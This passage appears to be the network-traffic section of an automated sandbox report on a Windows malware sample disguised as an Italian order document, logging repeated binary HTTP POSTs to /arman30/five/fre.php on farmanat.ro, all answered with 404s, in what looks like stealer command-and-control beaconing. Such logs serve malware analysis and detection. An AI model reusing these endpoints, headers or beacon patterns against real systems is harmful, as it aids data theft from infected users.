                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              270192.168.11.2050112176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              271192.168.11.2050113176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              272192.168.11.2050114176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              273192.168.11.2050115176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              274192.168.11.2050116176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              275192.168.11.2050117176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              276192.168.11.2050118176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              277192.168.11.2050119176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              278192.168.11.2050120176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              279192.168.11.2050121176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              28192.168.11.2049863176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:19.719300985 CET6343OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:19.804265976 CET6344INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              280192.168.11.2050122176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              281192.168.11.2050123176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              282192.168.11.2050124176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              283192.168.11.2050125176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              284192.168.11.2050126176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              285192.168.11.2050127176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              286192.168.11.2050128176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              287192.168.11.2050129176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              288192.168.11.2050130176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              289192.168.11.2050131176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              29192.168.11.2049864176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:20.354984999 CET6345OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:20.438185930 CET6345INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              290192.168.11.2050132176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              291192.168.11.2050133176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              292192.168.11.2050134176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              293192.168.11.2050135176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              294192.168.11.2050136176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              295192.168.11.2050137176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              296192.168.11.2050138176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              297192.168.11.2050139176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              298192.168.11.2050140176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              299192.168.11.2050141176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.11.2049822176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:01.719255924 CET6303OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:01.885267019 CET6304INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              30192.168.11.2049865176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:21.038147926 CET6346OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:21.125472069 CET6347INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              300192.168.11.2050142176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              301192.168.11.2050143176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              302192.168.11.2050144176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              303192.168.11.2050145176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              304192.168.11.2050146176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              305192.168.11.2050147176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              306192.168.11.2050148176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              307192.168.11.2050149176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              308192.168.11.2050150176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              309192.168.11.2050151176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              31192.168.11.2049866176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:21.765352011 CET6347OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:21.848124981 CET6348INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              310192.168.11.2050152176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              311192.168.11.2050153176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              312192.168.11.2050154176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              313192.168.11.2050155176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              314192.168.11.2050156176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              315192.168.11.2050157176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              316192.168.11.2050158176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              317192.168.11.2050159176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              318192.168.11.2050160176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              319192.168.11.2050161176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              32192.168.11.2049867176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:22.464833975 CET6349OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:22.549273968 CET6349INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              320192.168.11.2050162176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              321192.168.11.2050163176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              322192.168.11.2050164176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              323192.168.11.2050166176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              324192.168.11.2050167176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              325192.168.11.2050168176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              326192.168.11.2050169176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              327192.168.11.2050170176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              328192.168.11.2050171176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              329192.168.11.2050172176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              33192.168.11.2049869176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:23.130212069 CET6356OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:23.214514017 CET6357INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              330192.168.11.2050173176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              331192.168.11.2050174176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              332192.168.11.2050175176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              333192.168.11.2050176176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              334192.168.11.2050177176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              335192.168.11.2050178176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              336192.168.11.2050179176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              337192.168.11.2050180176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              338192.168.11.2050181176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              339192.168.11.2050182176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              34192.168.11.2049870176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:23.726845980 CET6358OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:23.811579943 CET6358INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              340192.168.11.2050183176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              341192.168.11.2050184176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              342192.168.11.2050185176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              343192.168.11.2050186176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              344192.168.11.2050187176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              345192.168.11.2050188176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              346192.168.11.2050189176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              347192.168.11.2050190176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              348192.168.11.2050191176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              349192.168.11.2050192176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              35192.168.11.2049871176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:24.413482904 CET6359OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:24.498095989 CET6360INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              350192.168.11.2050193176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              351192.168.11.2050194176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              352192.168.11.2050195176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              353192.168.11.2050196176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              354192.168.11.2050197176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              355192.168.11.2050198176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              356192.168.11.2050199176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              357192.168.11.2050200176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              358192.168.11.2050201176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              359192.168.11.2050202176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              36192.168.11.2049872176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:25.080255032 CET6360OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:25.168153048 CET6361INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
